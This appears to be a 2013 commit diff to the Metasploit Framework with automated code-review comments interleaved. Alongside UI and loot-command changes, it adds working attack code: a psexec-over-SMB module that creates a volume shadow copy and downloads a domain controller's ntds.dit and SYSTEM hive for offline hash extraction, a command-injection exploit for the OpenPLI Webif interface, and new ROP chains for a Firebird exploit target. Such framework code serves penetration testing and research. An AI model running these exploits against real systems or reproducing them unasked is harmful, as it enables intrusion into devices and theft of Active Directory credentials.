bug/bundler_fix
Doug P 2013-03-14 16:10:10 -04:00
commit 4bb64a0f41
11 changed files with 473 additions and 40 deletions

Binary file not shown.


@ -15,7 +15,7 @@
</DimensionLayout>
<DimensionLayout dim="1">
<Group type="103" groupAlignment="0" attributes="0">
<Component id="tabbedPane" alignment="1" pref="530" max="32767" attributes="0"/>
<Component id="tabbedPane" alignment="1" pref="534" max="32767" attributes="0"/>
</Group>
</DimensionLayout>
</Layout>
@ -308,7 +308,7 @@
<Property name="name" type="java.lang.String" value="credsTable" noResource="true"/>
</Properties>
<AuxValues>
<AuxValue name="JavaCodeGenerator_CreateCodeCustom" type="java.lang.String" value="new MsfTable(rpcConn, new String [] {&quot;Host&quot;, &quot;Time&quot;, &quot;Port&quot;, &quot;Proto&quot;, &quot;Sname&quot;, &quot;Type&quot;, &quot;User&quot;, &quot;Pass&quot;, &quot;Active&quot;&#xa; }, &quot;creds&quot;, new String[]{&quot;host&quot;, &quot;time&quot;, &quot;port&quot;, &quot;proto&quot;, &quot;sname&quot;, &quot;type&quot;, &quot;user&quot;, &quot;pass&quot;, &quot;active&quot;})"/>
<AuxValue name="JavaCodeGenerator_CreateCodeCustom" type="java.lang.String" value="new MsfTable(rpcConn, new String [] {&quot;Host&quot;, &quot;Updated&quot;, &quot;Port&quot;, &quot;Proto&quot;, &quot;Sname&quot;, &quot;Type&quot;, &quot;User&quot;, &quot;Pass&quot;, &quot;Active&quot;&#xa; }, &quot;creds&quot;, new String[]{&quot;host&quot;, &quot;updated_at&quot;, &quot;port&quot;, &quot;proto&quot;, &quot;sname&quot;, &quot;type&quot;, &quot;user&quot;, &quot;pass&quot;, &quot;active&quot;})"/>
</AuxValues>
</Component>
</SubComponents>


@ -527,8 +527,8 @@ nameloop: for (int i = 0; i < names.length; i++) {
lootsTable = new MsfTable(rpcConn,new String [] {"Host", "Service", "Ltype", "Ctype", "Data", "Created", "Updated", "Name", "Info"
}, "loots", new String[]{"host", "service", "ltype", "ctype", "data", "created_at", "updated_at", "name", "info"});
credsPane = new javax.swing.JScrollPane();
credsTable = new MsfTable(rpcConn, new String [] {"Host", "Time", "Port", "Proto", "Sname", "Type", "User", "Pass", "Active"
}, "creds", new String[]{"host", "time", "port", "proto", "sname", "type", "user", "pass", "active"});
credsTable = new MsfTable(rpcConn, new String [] {"Host", "Updated", "Port", "Proto", "Sname", "Type", "User", "Pass", "Active"
}, "creds", new String[]{"host", "updated_at", "port", "proto", "sname", "type", "user", "pass", "active"});
menuBar = new javax.swing.JMenuBar();
javax.swing.JMenu fileMenu = new javax.swing.JMenu();
connectRpcMenuItem = new javax.swing.JMenuItem();
@ -710,7 +710,7 @@ nameloop: for (int i = 0; i < names.length; i++) {
);
mainPanelLayout.setVerticalGroup(
mainPanelLayout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addComponent(tabbedPane, javax.swing.GroupLayout.Alignment.TRAILING, javax.swing.GroupLayout.DEFAULT_SIZE, 530, Short.MAX_VALUE)
.addComponent(tabbedPane, javax.swing.GroupLayout.Alignment.TRAILING, javax.swing.GroupLayout.DEFAULT_SIZE, 534, Short.MAX_VALUE)
);
menuBar.setName("menuBar"); // NOI18N


@ -156,7 +156,7 @@ module Auxiliary::Web
end
def log_fingerprint( opts = {} )
mode = details[:category].to_sym
mode = name
vhash = [target.to_url, opts[:fingerprint], mode, opts[:location]].
map { |x| x.to_s }.join( '|' ).hash
@ -187,12 +187,12 @@ module Auxiliary::Web
report_web_vuln( info )
print_good " FOUND(#{mode.to_s.upcase}) URL(#{location})"
print_good " FOUND(#{mode.to_s}) URL(#{location})"
print_good " PROOF(#{opts[:fingerprint]})"
end
def log_resource( opts = {} )
mode = details[:category].to_sym
mode = name
vhash = [target.to_url, mode, opts[:location]].
map { |x| x.to_s }.join( '|' ).hash
@ -221,12 +221,12 @@ module Auxiliary::Web
report_web_vuln( info )
print_good " VULNERABLE(#{mode.to_s.upcase}) URL(#{target.to_url})"
print_good " VULNERABLE(#{mode.to_s}) URL(#{target.to_url})"
print_good " PROOF(#{opts[:location]})"
end
def process_vulnerability( element, proof, opts = {} )
mode = details[:category].to_sym
mode = name
vhash = [target.to_url, mode, element.altered].
map{ |x| x.to_s }.join( '|' ).hash
@ -281,7 +281,7 @@ module Auxiliary::Web
report_web_vuln( info )
print_good " VULNERABLE(#{mode.to_s.upcase}) URL(#{target.to_url})" +
print_good " VULNERABLE(#{mode.to_s}) URL(#{target.to_url})" +
" PARAMETER(#{element.altered}) VALUES(#{element.params})"
print_good " PROOF(#{proof})"
end
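Review bot: The `.to_s` inside `#{mode.to_s}` on the three rewritten print_good lines is redundant, since string interpolation already calls to_s, and because `mode` is now nothing more than an alias for `name`, the local reads like a leftover from the category-symbol version; `print_good " VULNERABLE(#{name}) URL(#{target.to_url})"` says the same thing directly. Replacing the category symbol also changes what `vhash` is built from in each of the three methods, so duplicates are now keyed on the module name rather than the category; that is presumably intended, but a one-line comment such as `# dedupe key: url + module name + location` would record it. The bodies of log_fingerprint, log_resource and process_vulnerability all start and end outside these hunks.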


@ -118,7 +118,7 @@ class Path < Fuzzable
end
def self.from_model( form )
e = new( :action => "#{form.path}?#{form.query}", :input => inputs[0][1] )
e = new( :action => "#{form.path}?#{form.query}", :input => form.inputs[0][1] )
e.model = form
e
end
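Review bot: `form.inputs[0][1]` raises NoMethodError on nil when the form has no inputs, so the corrected line trades the old undefined `inputs` for a crash on an empty form; if `inputs` is a list of name/value pairs as the indexing suggests, guard it with `input = form.inputs.first` followed by `e = new( :action => "#{form.path}?#{form.query}", :input => input && input[1] )`. Whether `new` accepts a nil `:input` is not visible here, so the alternative is an explicit early return or a raise with a clear message. The Path class continues outside the hunk.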


@ -1,5 +1,5 @@
# -*- coding: binary -*-
#
require 'rexml/document'
require 'rex/parser/nmap_xml'
require 'msf/core/db_export'
@ -975,8 +975,15 @@ class Db
end
def cmd_loot_help
print_line "Usage: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]"
print_line "Usage: loot <options>"
print_line " Info: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]"
print_line " Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] [-t [type]"
print_line " Del: loot -d [addr1 addr2 ...]"
print_line
print_line " -a,--add Add loot to the list of addresses, instead of listing"
print_line " -d,--delete Delete *all* loot matching host and type"
print_line " -f,--file File with contents of the loot to add"
print_line " -i,--info Info of the loot to add"
print_line " -t <type1,type2> Search for a list of types"
print_line " -h,--help Show this help information"
print_line " -S,--search Search string to filter by"
@ -991,31 +998,52 @@ class Db
types = nil
delete_count = 0
search_term = nil
file = nil
name = nil
info = nil
while (arg = args.shift)
case arg
when '-d','--delete'
mode = :delete
when '-t'
typelist = args.shift
if(!typelist)
print_status("Invalid type list")
when '-a','--add'
mode = :add
when '-d','--delete'
mode = :delete
when '-f','--file'
filename = args.shift
if(!filename)
print_error("Can't make loot with no filename")
return
end
if (!File.exists?(filename) or !File.readable?(filename))
print_error("Can't read file")
return
end
when '-i','--info'
info = args.shift
if(!info)
print_error("Can't make loot with no info")
return
end
types = typelist.strip().split(",")
when '-S', '--search'
search_term = /#{args.shift}/nmi
when '-h','--help'
cmd_loot_help
return
else
# Anything that wasn't an option is a host to search for
unless (arg_host_range(arg, host_ranges))
when '-t'
typelist = args.shift
if(!typelist)
print_error("Invalid type list")
return
end
types = typelist.strip().split(",")
when '-S', '--search'
search_term = /#{args.shift}/nmi
when '-h','--help'
cmd_loot_help
return
else
# Anything that wasn't an option is a host to search for
unless (arg_host_range(arg, host_ranges))
return
end
end
end
tbl = Rex::Ui::Text::Table.new({
'Header' => "Loot",
'Columns' => [ 'host', 'service', 'type', 'name', 'content', 'info', 'path' ],
@ -1024,6 +1052,32 @@ class Db
# Sentinal value meaning all
host_ranges.push(nil) if host_ranges.empty?
if mode == :add
if info.nil?
print_error("Info required")
return
end
if filename.nil?
print_error("Loot file required")
return
end
if types.nil? or types.size != 1
print_error("Exactly one loot type is required")
return
end
type = types.first
name = File.basename(filename)
host_ranges.each do |range|
range.each do |host|
file = File.open(filename, "rb")
contents = file.read
lootfile = framework.db.find_or_create_loot(:type => type, :host => host,:info => info, :data => contents,:path => filename,:name => name)
print_status "Added loot #{host}"
end
end
return
end
each_host_range_chunk(host_ranges) do |host_search|
framework.db.hosts(framework.db.workspace, false, host_search).each do |host|
host.loots.each do |loot|
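Review bot: In the new `:add` branch the loot file is opened with `File.open(filename, "rb")` inside the per-host loop and never closed, so one handle leaks per host and the file is re-read for every address; read it once before the loops with `contents = File.binread(filename)`. The same branch iterates `host_ranges`, but the context line just above it pushes `nil` as the "all hosts" sentinel when no address was given, so an add with no host ends in NoMethodError on `nil.each` instead of a usage error; check for the sentinel before looping. The `lootfile` assignment is unused, and the help text in the earlier hunk has an unbalanced bracket in `[-t [type]`. cmd_loot starts before this hunk and continues after it.
```ruby
if mode == :add
  # … unchanged: info / filename / types validation …
  type = types.first
  name = File.basename(filename)
  # host_ranges == [nil] is the "every host" sentinel set just above; loot
  # must be attached to explicit hosts, so refuse it here rather than
  # letting nil.each raise.
  if host_ranges.compact.empty?
    print_error("At least one host address is required to add loot")
    return
  end
  # Read the file once; File.binread closes the handle itself.
  contents = File.binread(filename)
  host_ranges.each do |range|
    range.each do |host|
      framework.db.find_or_create_loot(:type => type, :host => host, :info => info, :data => contents, :path => filename, :name => name)
      print_status "Added loot #{host}"
    end
  end
  return
end
```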


@ -0,0 +1,270 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB
include Msf::Exploit::Remote::SMB::Psexec
include Msf::Exploit::Remote::SMB::Authenticated
include Msf::Auxiliary::Report
# Aliases for common classes
SIMPLE = Rex::Proto::SMB::SimpleClient
XCEPT= Rex::Proto::SMB::Exceptions
CONST= Rex::Proto::SMB::Constants
def initialize(info = {})
super(update_info(info,
'Name' => 'PsExec NTDS.dit And SYSTEM Hive Download Utility',
'Description'=> %q{
This module authenticates to an Active Directory Domain Controller and creates
a volume shadow copy of the %SYSTEMDRIVE%. It then pulls down copies of the
ntds.dit file as well as the SYSTEM hive and stores them. The ntds.dit and SYSTEM
hive copy can be used in combination with other tools for offline extraction of AD
password hashes. All of this is done without uploading a single binary to the
target host.
},
'Author' => [
'Royce Davis <rdavis[at]accuvant.com>' # @R3dy__
],
'License'=> MSF_LICENSE,
'References' => [
[ 'URL', 'http://sourceforge.net/projects/smbexec' ],
[ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ]
],
))
register_options([
OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),
OptString.new('VSCPATH', [false, 'The path to the target Volume Shadow Copy', '']),
OptString.new('WINPATH', [true, 'The name of the Windows directory (examples: WINDOWS, WINNT)', 'WINDOWS']),
OptBool.new('CREATE_NEW_VSC', [false, 'If true, attempts to create a volume shadow copy', 'false']),
], self.class)
end
def peer
return "#{rhost}:#{rport}"
end
# This is the main control method
def run
# Initialize some variables
text = "\\#{datastore['WINPATH']}\\Temp\\#{Rex::Text.rand_text_alpha(16)}.txt"
bat = "\\#{datastore['WINPATH']}\\Temp\\#{Rex::Text.rand_text_alpha(16)}.bat"
createvsc = "vssadmin create shadow /For=%SYSTEMDRIVE%"
@ip = datastore['RHOST']
@smbshare = datastore['SMBSHARE']
# Try and connect
if connect
#Try and authenticate with given credentials
begin
smb_login
rescue StandardError => autherror
print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}")
return
end
# If a VSC was specified then don't try and create one
if datastore['VSCPATH'].length > 0
print_status("#{peer} - Attempting to copy NTDS.dit from #{datastore['VSCPATH']}")
vscpath = datastore['VSCPATH']
else
unless datastore['CREATE_NEW_VSC'] == true
vscpath = check_vss(text, bat)
end
unless vscpath
vscpath = make_volume_shadow_copy(createvsc, text, bat)
end
end
if vscpath
if copy_ntds(vscpath, text) and copy_sys_hive
download_ntds((datastore['WINPATH'] + "\\Temp\\ntds"))
download_sys_hive((datastore['WINPATH'] + "\\Temp\\sys"))
else
print_error("#{peer} - Failed to find a volume shadow copy. Issuing cleanup command sequence.")
end
end
cleanup_after(bat, text, "\\#{datastore['WINPATH']}\\Temp\\ntds", "\\#{datastore['WINPATH']}\\Temp\\sys")
disconnect
end
end
# Thids method will check if a Volume Shadow Copy already exists and use that rather
# then creating a new one
def check_vss(text, bat)
begin
print_status("#{peer} - Checking if a Volume Shadow Copy exists already.")
prepath = '\\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy'
command = "%COMSPEC% /C echo vssadmin list shadows ^> #{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}"
result = psexec(command)
data = smb_read_file(datastore['SMBSHARE'], @ip, text)
vscs = []
data.each_line { |line| vscs << line if line.include?("GLOBALROOT") }
if vscs.empty?
print_status("#{peer} - No VSC Found.")
return nil
end
vscpath = prepath + vscs[vscs.length - 1].to_s.split("ShadowCopy")[1].to_s.chomp
print_good("#{peer} - Volume Shadow Copy exists on #{vscpath}")
return vscpath
rescue StandardError => vsscheckerror
print_error("#{peer} - Unable to determine if VSS is enabled: #{vsscheckerror}")
return nil
end
end
# Create a Volume Shadow Copy on the target host
def make_volume_shadow_copy(createvsc, text, bat)
begin
#Try to create the shadow copy
command = "%COMSPEC% /C echo #{createvsc} ^> #{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}"
print_status("#{peer} - Creating Volume Shadow Copy")
out = psexec(command)
#Get path to Volume Shadow Copy
vscpath = get_vscpath(text)
rescue StandardError => vscerror
print_error("#{peer} - Unable to create the Volume Shadow Copy: #{vscerror}")
return nil
end
if vscpath
print_good("#{peer} - Volume Shadow Copy created on #{vscpath}")
return vscpath
else
return nil
end
end
# Copy ntds.dit from the Volume Shadow copy to the Windows Temp directory on the target host
def copy_ntds(vscpath, text)
begin
ntdspath = vscpath.to_s + "\\" + datastore['WINPATH'] + "\\NTDS\\ntds.dit"
command = "%COMSPEC% /C copy /Y \"#{ntdspath}\" %WINDIR%\\Temp\\ntds"
run = psexec(command)
if !check_ntds(text)
return false
end
return true
rescue StandardError => ntdscopyerror
print_error("#{peer} - Unable to copy ntds.dit from Volume Shadow Copy.Make sure target is a Windows Domain Controller: #{ntdscopyerror}")
return false
end
end
# Checks if ntds.dit was copied to the Windows Temp directory
def check_ntds(text)
print_status("#{peer} - Checking if NTDS.dit was copied.")
check = "%COMSPEC% /C dir \\#{datastore['WINPATH']}\\Temp\\ntds > #{text}"
run = psexec(check)
output = smb_read_file(@smbshare, @ip, text)
if output.include?("ntds")
return true
end
return false
end
# Copies the SYSTEM hive file to the Temp directory on the target host
def copy_sys_hive
begin
# Try to crate the sys hive copy
command = "%COMSPEC% /C reg.exe save HKLM\\SYSTEM %WINDIR%\\Temp\\sys /y"
return psexec(command)
rescue StandardError => hiveerror
print_error("#{peer} - Unable to copy the SYSTEM hive file: #{hiveerror}")
return false
end
end
# Download the ntds.dit copy to your attacking machine
def download_ntds(file)
print_status("#{peer} - Downloading ntds.dit file")
begin
# Try to download ntds.dit
simple.connect("\\\\#{@ip}\\#{@smbshare}")
remotefile = simple.open("#{file}", 'rob')
data = remotefile.read
remotefile.close
ntds_path = store_loot("psexec.ntdsgrab.ntds", "application/octet-stream", @ip, data, "ntds.dit")
print_good("#{peer} - ntds.dit stored at #{ntds_path}")
rescue StandardError => ntdsdownloaderror
print_error("#{peer} - Unable to downlaod ntds.dit: #{ntdsdownloaderror}")
return ntdsdownloaderror
end
simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
end
# Download the SYSTEM hive copy to your attacking machine
def download_sys_hive(file)
print_status("#{peer} - Downloading SYSTEM hive file")
begin
# Try to download SYSTEM hive
simple.connect("\\\\#{@ip}\\#{@smbshare}")
remotefile = simple.open("#{file}", 'rob')
data = remotefile.read
remotefile.close
hive_path = store_loot("psexec.ntdsgrab.hive", "application/octet-stream", @ip, data, "system-hive")
print_good("#{peer} - SYSTEM hive stored at #{hive_path}")
rescue StandardError => sysdownloaderror
print_error("#{peer} - Unable to download SYSTEM hive: #{sysdownloaderror}")
return sysdownloaderror
end
simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
end
# Gets the path to the Volume Shadow Copy
def get_vscpath(file)
begin
prepath = '\\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy'
vsc = ""
output = smb_read_file(@smbshare, @ip, file)
output.each_line do |line|
vsc += line if line.include?("GLOBALROOT")
end
return prepath + vsc.split("ShadowCopy")[1].chomp
rescue StandardError => vscpath_error
print_error("#{peer} - Could not determine the exact path to the VSC check your WINPATH")
return nil
end
end
# Removes files created during execution.
def cleanup_after(*files)
simple.connect("\\\\#{@ip}\\#{@smbshare}")
print_status("#{peer} - Executing cleanup...")
files.each do |file|
begin
if smb_file_exist?(file)
smb_file_rm(file)
end
rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror
print_error("#{peer} - Unable to cleanup #{file}. Error: #{cleanuperror}")
end
end
left = files.collect{ |f| smb_file_exist?(f) }
if left.any?
print_error("#{peer} - Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.")
else
print_status("#{peer} - Cleanup was successful")
end
simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
end
end
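Review bot: In `cleanup_after`, `left = files.collect{ |f| smb_file_exist?(f) }` is an array of booleans, so the failure message prints `true, false` rather than the paths still left on the target; `left = files.select { |f| smb_file_exist?(f) }` yields the intended list and `left.any?` keeps working. `download_ntds` and `download_sys_hive` return the rescued exception object on failure and the result of `simple.disconnect` on success, and `run` never inspects either, so a failed download is visible only in the log; returning true/false would let `run` report it. The locals `result`, `out` and `run` (the last one sharing its name with the main method) only hold unused psexec return values and can be dropped, and "Thids" in the check_vss comment is a typo.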


@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
def run
serverIP = datastore['RHOST']
if (datastore['RPORT'].o_i != 80)
if (datastore['RPORT'].to_i != 80)
serverIP += ":" + datastore['RPORT'].to_s
end
isapiURI = datastore['ISAPI']


@ -16,17 +16,20 @@ class Metasploit4 < Msf::Auxiliary
super(update_info(info,
'Name' => 'Dopewars Denial of Service',
'Description' => %q{
The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input validation.
The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to
a lack of input validation.
},
'Author' => [ 'Doug Prostko <dougtko[at]gmail.com>' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'BID', '36606' ],
[ 'CVE', '2009-3591' ],
]))
[ 'OSVDB', '58884' ],
[ 'BID', '36606' ]
],
'DisclosureDate' => "Oct 05 2009" ))
register_options([Opt::RPORT(7902),], self.class)
register_options([Opt::RPORT(7902)], self.class)
end
def run
@ -44,13 +47,13 @@ class Metasploit4 < Msf::Auxiliary
disconnect
print_status("Checking for success...")
sleep 2
select(nil, nil, nil, 2)
begin
connect
rescue ::Interrupt
raise $!
rescue ::Rex::ConnectionRefused
print_good("Dopewars server succesfully shut down!")
print_good("Dopewars server successfully shut down!")
else
print_error("DOS attack unsuccessful")
ensure
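Review bot: The rewritten references block keeps BID 36606 and adds OSVDB 58884, but `[ 'CVE', '2009-3591' ]` appears only once in the first hunk, on what reads as the removed side, so the CVE identifier seems to have been dropped; it should stay in the new array alongside the OSVDB entry. In the second hunk `select(nil, nil, nil, 2)` is a bare socket select used purely as a delay, which reads as a socket wait to anyone unfamiliar with the idiom; `Rex::ThreadSafe.sleep(2)` states the intent directly. Both hunks sit inside initialize and run, whose bodies continue outside the shown lines.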


@ -0,0 +1,77 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenPLI Webif Arbitrary Command Execution',
'Description' => %q{
Some Dream Boxes with OpenPLI v3 beta Images are vulnerable to OS command
injection in the Webif 6.0.4 Web Interface. This is a blind injection, which means
that you will not see any output of your command. A ping command can be used for
testing the vulnerability. This module has been tested in a box with the next
features: Linux Kernel version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1
Wed Aug 17 23:54:07 CEST 2011, Firmware release 1.1.0 (27.01.2013), FP Firmware
1.06 and Web Interface 6.0.4-Expert (PLi edition).
},
'Author' => [ 'm-1-k-3' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '90230' ],
[ 'BID', '57943' ],
[ 'EDB', '24498' ],
[ 'URL', 'http://openpli.org/wiki/Webif' ],
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-007' ]
],
'Platform' => ['unix', 'linux'],
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'netcat generic'
}
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 08 2013'
))
end
def exploit
print_status("#{rhost}:#{rport} - Sending remote command...")
vprint_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
begin
send_request_cgi(
{
'uri' => normalize_uri("cgi-bin", "setConfigSettings"),
'method' => 'GET',
'vars_get' => {
"maxmtu" => "1500&#{payload.encoded}&"
}
})
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
fail_with(Msf::Exploit::Failure::Unreachable, "#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
end
end
end
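Review bot: The description's "This module has been tested in a box with the next features" is not idiomatic English and, as module text shown to users, should read "This module has been tested on a box with the following characteristics". In `exploit` the return value of `send_request_cgi` is discarded, so a nil response (the client returning without raising) is indistinguishable from a delivered request; given the injection is blind that may be acceptable, but a `vprint_status` of the response code when one is returned would make failed runs easier to diagnose.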


@ -48,10 +48,11 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Targets' =>
[
# pivots are pointers to stack pivots
# pivots are pointers to stack pivots of size 0x28
[ 'Windows FB 2.5.2.26539', { 'pivot' => 0x005ae1fc, 'rop_nop' => 0x005b0384, 'rop_pop' => 0x4a831344 } ],
[ 'Windows FB 2.5.1.26351', { 'pivot' => 0x4add2302, 'rop_nop' => 0x00424a50, 'rop_pop' => 0x00656472 } ],
[ 'Windows FB 2.1.5.18496', { 'pivot' => 0x4ad5df4d, 'rop_nop' => 0x0042ba8c, 'rop_pop' => 0x005763d5 } ],
[ 'Windows FB 2.1.4.18393', { 'pivot' => 0x4adf4ed5, 'rop_nop' => 0x00423b82, 'rop_pop' => 0x4a843429 } ],
[ 'Debug', { 'pivot' => 0xdead1337, 'rop_nop' => 0xdead1337, 'rop_pop' => 0xdead1337 } ]
],
'DefaultTarget' => 0,
@ -124,10 +125,18 @@ class Metasploit3 < Msf::Exploit::Remote
rop_chain = [
0x0055b844, # MOV EAX,EDI # RETN [fbserver.exe]
0x4a86ee77, # POP ECX # RETN [icuuc30.dll]
0x000001c0, # 0x000001c0-> ebp
0x000001c0, # 0x000001c0-> ecx
0x005aee63, # ADD EAX,ECX # RETN [fbserver.exe]
0x4a82d326, # XCHG EAX,ESP # RETN [icuuc30.dll]
].pack("V*")
when 'Windows FB 2.1.4.18393'
rop_chain = [
0x0042264c, # MOV EAX,EDI # RETN [fbserver.exe]
0x4a8026e1, # POP ECX # RETN [icuuc30.dll]
0x000001c0, # 0x000001c0-> ecx
0x004c5499, # ADD EAX,ECX # RETN [fbserver.exe]
0x4a847664, # XCHG EAX,ESP # RETN [icuuc30.dll]
].pack("V*")
when 'Debug'
rop_chain = [ ].fill(0x41414141, 0..5).pack("V*")
end
@ -196,7 +205,27 @@ class Metasploit3 < Msf::Exploit::Remote
0x00577605, # POP EAX # RETN [fbserver.exe]
0x90909090, # nop
0x004530ce, # PUSHAD # RETN [fbserver.exe]
].flatten.pack("V*")
].pack("V*")
when 'Windows FB 2.1.4.18393'
rop_chain = [
0x4a843429, # POP ECX # RETN [icuuc30.dll]
0x005ca120, # ptr to &VirtualAlloc() [IAT fbserver.exe]
0x0055a870, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]
0x004cecf6, # XCHG EAX,ESI # RETN [fbserver.exe]
0x004279c0, # POP EBP # RETN [fbserver.exe]
0x0040747d, # & call esp [fbserver.exe]
0x004ebef1, # POP EBX # RETN [fbserver.exe]
0x00001000, # 0x00001000-> ebx
0x4a864c5e, # POP EDX # RETN [icuuc30.dll]
0x00001000, # 0x00001000-> edx
0x004eaa3b, # POP ECX # RETN [fbserver.exe]
0x00000040, # 0x00000040-> ecx
0x4a8330a2, # POP EDI # RETN [icuuc30.dll]
0x00423b82, # RETN (ROP NOP) [fbserver.exe]
0x0046b5b1, # POP EAX # RETN [fbserver.exe]
0x90909090, # nop
0x004c8cfc, # PUSHAD # RETN [fbserver.exe]
].pack("V*")
when 'Debug'
rop_chain = [ ].fill(0x41414141, 0..17).pack("V*")
end